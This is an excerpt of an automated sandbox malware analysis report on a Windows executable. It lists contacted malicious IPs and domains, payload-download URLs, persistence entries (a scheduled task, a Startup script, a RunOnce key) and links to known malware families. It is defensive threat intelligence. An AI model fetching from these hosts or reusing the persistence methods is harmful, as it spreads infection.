https://word.office.com576	explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
http://www.lua.org	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://liernessfornicsa.shop/_	lm.exe, 00000026.00000003.2640613432.000000000067D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarB	IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com/$	explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rar6	IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://callosallsaospz.shop/	BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://liernessfornicsa.shop/g	lm.exe, 00000026.00000003.2805912888.0000000003127000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://html4/loose.dtd	B552.exe, 0000001B.00000000.2227779245.00007FF75F304000.00000008.00000001.01000000.0000000B.sdmp, B552.exe, 0000001B.00000002.2363529476.00007FF75F313000.00000008.00000001.01000000.0000000B.sdmp, B552.exe.14.dr	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr	lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/api(	lm.exe, 00000026.00000003.2846410742.000000000313E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q	753F.exe.14.dr	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0	753F.exe.14.dr	false	URL Reputation: safe	unknown
http://store4.gofile.io	powershell.exe, 00000020.00000002.2624078104.0000020A690FF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k4.rarO	IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.css	B552.exe, 0000001B.00000000.2227779245.00007FF75F304000.00000008.00000001.01000000.0000000B.sdmp, B552.exe, 0000001B.00000002.2363529476.00007FF75F313000.00000008.00000001.01000000.0000000B.sdmp, B552.exe.14.dr	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 0000000E.00000000.1444301138.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1446452497.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1446467091.0000000007B10000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.baanboard.comBrendon	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	753F.exe.14.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.221.157.163	unknown	Russian Federation	30968	INFOBOX-ASInfoboxruAutonomousSystemRU	true
107.173.160.139	unknown	United States	36352	AS-COLOCROSSINGUS	true
107.173.160.137	unknown	United States	36352	AS-COLOCROSSINGUS	true
172.67.213.85	liernessfornicsa.shop	United States	13335	CLOUDFLARENETUS	true
211.168.53.110	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
162.0.235.84	funrecipebooks.com	Canada	22612	NAMECHEAP-NETUS	true
64.190.113.113	unknown	United States	26646	TRAVELCLICKCORP1US	true
94.156.79.190	unknown	Bulgaria	43561	NET1-ASBG	true
104.26.3.16	rentry.co	United States	13335	CLOUDFLARENETUS	true
44.221.84.105	ddos.dnsnb8.net	United States	14618	AMAZON-AESUS	false
189.165.133.52	gebeus.ru	Mexico	8151	UninetSAdeCVMX	true
167.235.128.153	unknown	United States	3525	ALBERTSONSUS	true
188.114.96.3	callosallsaospz.shop	European Union	13335	CLOUDFLARENETUS	true
193.222.96.24	unknown	Germany	3303	SWISSCOMSwisscomSwitzerlandLtdCH	true
185.149.100.242	mussangroup.com	Turkey	209853	VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	true
31.14.70.245	store4.gofile.io	Virgin Islands (BRITISH)	199483	LINKER-ASFR	false

Private

IP
127.0.0.127

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480462
Start date and time:	2024-07-24 19:54:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7Y18r(14).exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@53/68@18/17
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 75% Number of executed functions: 151 Number of non-executed functions: 80
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 20.189.173.22, 20.42.73.29
Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target B552.exe, PID 4016 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6872 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 7Y18r(14).exe

Simulations

Behavior and APIs

Time	Type	Description
13:55:21	API Interceptor	3x Sleep call for process: WerFault.exe modified
13:55:22	API Interceptor	241144x Sleep call for process: explorer.exe modified
13:56:50	API Interceptor	8x Sleep call for process: BitLockerToGo.exe modified
13:56:54	API Interceptor	103x Sleep call for process: powershell.exe modified
13:57:18	API Interceptor	7x Sleep call for process: lm.exe modified
13:57:25	API Interceptor	1x Sleep call for process: 753F.exe modified
13:58:11	API Interceptor	20x Sleep call for process: vm.exe modified
19:55:37	Task Scheduler	Run new task: Firefox Default Browser Agent 97F3F3D2A5B67F56 path: C:\Users\user\AppData\Roaming\ftejced
19:57:19	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs
19:57:49	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUY C:\Users\user\AppData\Local\Temp\F6D9.exe
19:57:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUY C:\Users\user\AppData\Local\Temp\F6D9.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.221.157.163	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	77.221.157.163/systemd.exe
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	y2b1PHwo8d.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	SWjcpYfYPy.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
107.173.160.139	win.exe	Get hash	malicious	Unknown	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse
	y2b1PHwo8d.exe	Get hash	malicious	SmokeLoader	Browse
107.173.160.137	win.exe	Get hash	malicious	Unknown	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse
	y2b1PHwo8d.exe	Get hash	malicious	SmokeLoader	Browse
172.67.213.85	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rentry.co	Adobe-GenP.exe	Get hash	malicious	Unknown	Browse	104.26.2.16
	updater.exe	Get hash	malicious	Xmrig	Browse	172.67.75.40
	SecuriteInfo.com.Win32.Evo-gen.6791.6790.exe	Get hash	malicious	Python Stealer, CStealer, Xmrig	Browse	104.26.2.16
	doc2406.vbs	Get hash	malicious	FormBook	Browse	172.67.75.40
	SecuriteInfo.com.Win64.DropperX-gen.26552.421.exe	Get hash	malicious	Unknown	Browse	104.26.3.16
	SecuriteInfo.com.Win64.DropperX-gen.26552.421.exe	Get hash	malicious	Unknown	Browse	104.26.3.16
	TS-240622-Creal2.exe	Get hash	malicious	Python Stealer, CStealer	Browse	104.26.3.16
	REQUEST FOR QUOTATION.vbs	Get hash	malicious	Unknown	Browse	104.26.2.16
	SecuriteInfo.com.Win64.Malware-gen.18902.30045.exe	Get hash	malicious	Unknown	Browse	172.67.75.40
	wzcstatus.exe	Get hash	malicious	Unknown	Browse	104.26.3.16
gebeus.ru	file.exe	Get hash	malicious	SmokeLoader	Browse	58.151.148.90
	file.exe	Get hash	malicious	SmokeLoader	Browse	211.181.24.133
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	190.224.203.37
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	186.145.236.93
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	217.219.131.81
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	187.199.228.245
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	189.232.42.250
store4.gofile.io	w85VkFOxiD.exe	Get hash	malicious	Python Stealer, CStealer, NiceRAT, Quasar	Browse	31.14.70.245
	9afaXJv52z.exe	Get hash	malicious	Exela Stealer	Browse	31.14.70.245
	NoBackend.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	Microsoft_Teams_SC.ba#.bat	Get hash	malicious	Unknown	Browse	31.14.70.245
	c0PZAXHMCpdh5F1.exe	Get hash	malicious	Clipboard Hijacker, Redline Clipper, Stealerium	Browse	31.14.70.245
	5a7TEjoYQp.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	wins9c8hG6.exe	Get hash	malicious	Raccoon Stealer v2, Xmrig	Browse	31.14.70.245
	GameInject.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	KfpMPicGie.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	Install.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
bg.microsoft.map.fastly.net	Fd_HR24 Jul, 2024.pdf	Get hash	malicious	Phisher	Browse	199.232.210.172
	7Y18r(126).exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	Restortion.clinic.exe	Get hash	malicious	Empyrean, Discord Token Stealer	Browse	199.232.214.172
	Galaxy Swapper v2.0.3.exe	Get hash	malicious	RedLine	Browse	199.232.214.172
	https://hardbin.com/ipfs/bafybeiga5vzkl7kqn7di5xybctgfvt4qeafpco3tdquxl7efx55uscqpei	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://acrobat.adobe.com/id/urn:aaid:sc:eu:a5a1ab09-0129-4e68-a02e-8fed9888530c	Get hash	malicious	Unknown	Browse	199.232.210.172
	7E0879F28322430C582D4E54EC0D91FB19E0471B43CD460D30307FA6ACF0A385.exe	Get hash	malicious	Bdaejec, Mars Stealer, Vidar	Browse	199.232.210.172
	Ahxjl36V4o.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://bestfreinds.org	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://tsgfusion.com	Get hash	malicious	Unknown	Browse	199.232.210.172
ddos.dnsnb8.net	7Y18r(141).exe	Get hash	malicious	Bdaejec, Berbew	Browse	44.221.84.105
	7Y18r(128).exe	Get hash	malicious	Bdaejec, Berbew	Browse	44.221.84.105
	7E0CB6DB3BEE27907DAD2A3FF865F696E3676D61920FFCD66277BA4E3611F3D0.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	7E0879F28322430C582D4E54EC0D91FB19E0471B43CD460D30307FA6ACF0A385.exe	Get hash	malicious	Bdaejec, Mars Stealer, Vidar	Browse	44.221.84.105
	784D1C11E45442987D0DF7E3EA6B29BE845C92B0415A5FE4763378062D3FA721.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	7861180570ECFB48FCCC3E1CFF748974C64E58C31530AEE4F9243AF810200CC3.exe	Get hash	malicious	Bdaejec, SystemBC	Browse	44.221.84.105
	77ffbb4832c07549d761d3ed500f69f34d0a56622ebc3fba9ea2d6725791ea5b.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LGDACOMLGDACOMCorporationKR	94.156.8.9-skid.x86-2024-07-23T17_40_07.elf	Get hash	malicious	Mirai, Moobot	Browse	112.221.66.140
	yIRn1ZmsQF.elf	Get hash	malicious	Unknown	Browse	58.184.11.133
	LT7aP8OSZ3.elf	Get hash	malicious	Unknown	Browse	61.41.71.123
	865VzGOmoC.elf	Get hash	malicious	Mirai	Browse	123.143.47.59
	ZPPEqPIBy7.elf	Get hash	malicious	Unknown	Browse	58.72.143.55
	arm.elf	Get hash	malicious	Mirai	Browse	210.107.65.164
	Suav289vuI.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	112.222.229.70
	Pn0jlaHvxE.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	112.217.4.64
	EKi4eGLprr.elf	Get hash	malicious	Mirai, Okiru	Browse	112.219.236.146
	U8E1VlGTmr.elf	Get hash	malicious	Mirai	Browse	1.216.113.69
INFOBOX-ASInfoboxruAutonomousSystemRU	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	TkeeN4qh4z.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	77.221.157.163
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	NY2mig4fQh.exe	Get hash	malicious	CryptOne, RHADAMANTHYS	Browse	77.221.154.49
CLOUDFLARENETUS	Fd_HR24 Jul, 2024.pdf	Get hash	malicious	Phisher	Browse	172.64.41.3
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	Restortion.clinic.exe	Get hash	malicious	Empyrean, Discord Token Stealer	Browse	104.16.124.96
	https://url5041.app.lucid.co/uni/ls/click?upn=u001.9CEiYqsCeDB7JcEaXQIz-2F9XjjPqk-2Fb4pFcLw69B6WqTy-2BbVFLiir3sSJZjbRo6mBAwRtKNr9Kf4WztrdCBts7iyzvcJ-2FIUH0XDrcbuiiKrlzy8ZwzSxYR1urVGEa2H8lG0Sg7ExDExUtTEJeACnxEcvsJ4CnFcY2OyyabtZjsqjBmQJR0iCaQNYCn9tJqfPt0sqRsrpUZbmtTsF5u4sk76aC5ja3Exi0TVSSBuxtzkkrePRrkTP-2FRoxSefUr1y9ilFhR_7YHA5TjKTAFn3LEZM-2F5lkHKyiA7Z3uxS7g7w0lpFY3VgLh-2FDGXI29ABs2GTmbGZIZHIxymEIAIiyGRh1AnBalmp58yag9E-2FrtA2h0nETB9HIcrFd1W-2BMglDx2EcdWaE0YUaZKghF9gUd9evpWd9o10VlCUS2n6DDMef1lVzEPNeAVIceaFC5X-2FwVIdJYlE5ubbjTe48aOxl7EYAkQAbI29zMPLBfzmo3-2F0oDrCz1NV8Z-2BgLjNSkhEL0v7ztjcjSQNYmg2ZtX7GcpdQCCaWNVfhkazGgvvJB3QcWd-2Fo6uMwkENEvM1i8Q5dxjk3O7SagsKeqlZGHyVQYiVQV70Bj-2BqwPqn7sRJMYA1CWG3MbbSEiFggnHBU9leFka7-2BLjrmTxclzDNBbGoPiatzLWpKmVvw-2Bx5nC-2FbsV4WwngsYxWK1QG1aOsoJu-2FNsl5G06ywgOfHOifxw2PEX15DLqK9LKLpY23-2B0gBFiHHbP5xi3TlZqqdPIKY76qvnZKXKkRHP7lkjW54-2BjkWiD-2BFCJF-2BYwCLISwPacjQQKLVdWymA0jKWf0m780jvwQKochVtFIfu-2BJ9NnI-2BB2EwWIxQXcbAMYwMXcMBTQTHy61gyJ3FTzWhBE5wfCKo-2F8oXN5UhSp4kSbC0WEoFb3T831Z02n3p5vAL-2Ftzsl33DNu9nwqX-2FymwJG6bbNN49b2LwjYn6qVJYWS5SHBoNvXFMznGKBB-2Fn-2B5ec0wzJuS2t1Z7ZojX-2BZTbH-2F00rb4HPN-2BmX2VUh9CatGg9L1JM7vsjjRJrthuxEvN6-2BOqDHpRQ-2FjJ2ng1sbFzjs5LWXRhQ7AwghmMB4i-2FOI7rRt	Get hash	malicious	Unknown	Browse	172.64.150.44
	https://hardbin.com/ipfs/bafybeiga5vzkl7kqn7di5xybctgfvt4qeafpco3tdquxl7efx55uscqpei	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://forms.office.com/Pages/ResponsePage.aspx?id=q9W6SpYqak-gDukUxOfbFKrxeFwi_dtNtj4fQh9gMzZUMTZPR0tNMVg5QkozVFpKQlZSVDA0SExBWi4u	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	K-Lite_Codec_Pack_1848_Basic.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://forms.office.com/Pages/ResponsePage.aspx?id=OLE8nwnwvUGeQ8SAAnPcLaQBldauQopOpJ-jSe9_NVZUNlkxVjJDS1Q3REs1UURGM0hCWExBUE5KQS4u	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://assets-usa.mkt.dynamics.com/95689b1f-9545-ef11-bfdf-00224825570b/digitalassets/standaloneforms/40bb8d8b-d049-ef11-a317-6045bdd83a8b	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	104.16.124.96
AS-COLOCROSSINGUS	SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.9942.6374.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	K7Vp9qOJMN.exe	Get hash	malicious	Remcos	Browse	107.173.4.18
	Quotation.exe	Get hash	malicious	Remcos	Browse	107.173.4.18
	Quotation.xls	Get hash	malicious	Remcos	Browse	192.3.118.15
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	198.46.174.139
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	198.46.176.133
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.137
	XrAADcYten.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	M6hS9qGbFx.rtf	Get hash	malicious	AgentTesla	Browse	198.46.174.139
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.137
AS-COLOCROSSINGUS	SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.9942.6374.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	K7Vp9qOJMN.exe	Get hash	malicious	Remcos	Browse	107.173.4.18
	Quotation.exe	Get hash	malicious	Remcos	Browse	107.173.4.18
	Quotation.xls	Get hash	malicious	Remcos	Browse	192.3.118.15
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	198.46.174.139
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	198.46.176.133
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.137
	XrAADcYten.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	M6hS9qGbFx.rtf	Get hash	malicious	AgentTesla	Browse	198.46.174.139
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a6c95ef2da5b759f65c60665167952ee	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	file.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
3b5074b1b5d032e5620f69f9f700ff0e	20a10434.msi	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	kJs0JTLO6I.exe	Get hash	malicious	Metasploit	Browse	104.26.3.16 31.14.70.245
	kJs0JTLO6I.exe	Get hash	malicious	Metasploit	Browse	104.26.3.16 31.14.70.245
	4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exe	Get hash	malicious	Babadeda, Bdaejec	Browse	104.26.3.16 31.14.70.245
	https://netorgft13071175-my.sharepoint.com/:o:/g/personal/ron_paans_eosos_de/EVr6FZBbEFNKsxZzeT-AGJ4By1OBnTGB6A7gZiaEWkJe0Q?e=4%3aRHiujJ&at=9	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	http://myuhnj.org	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	https://url.us.m.mimecastprotect.com/s/UkmpCmZgG1h5BO2ghBi2tR8UWK?domain=forms.office.com	Get hash	malicious	HTMLPhisher	Browse	104.26.3.16 31.14.70.245
	rDHLReceipt_490104998009_xls.vbs	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	Invoice Copy.exe	Get hash	malicious	AgentTesla	Browse	104.26.3.16 31.14.70.245
	https://skvbermeo.freshdesk.com/en/support/solutions/articles/154000168804-pedido-purchase-order-s124m0003a	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
a0e9f5d64349fb13191bc781f81f42e1	7Y18r(111).exe	Get hash	malicious	Unknown	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3
	7Y18r(111).exe	Get hash	malicious	Unknown	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3
	XEV5ucEWu7.exe	Get hash	malicious	Unknown	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3
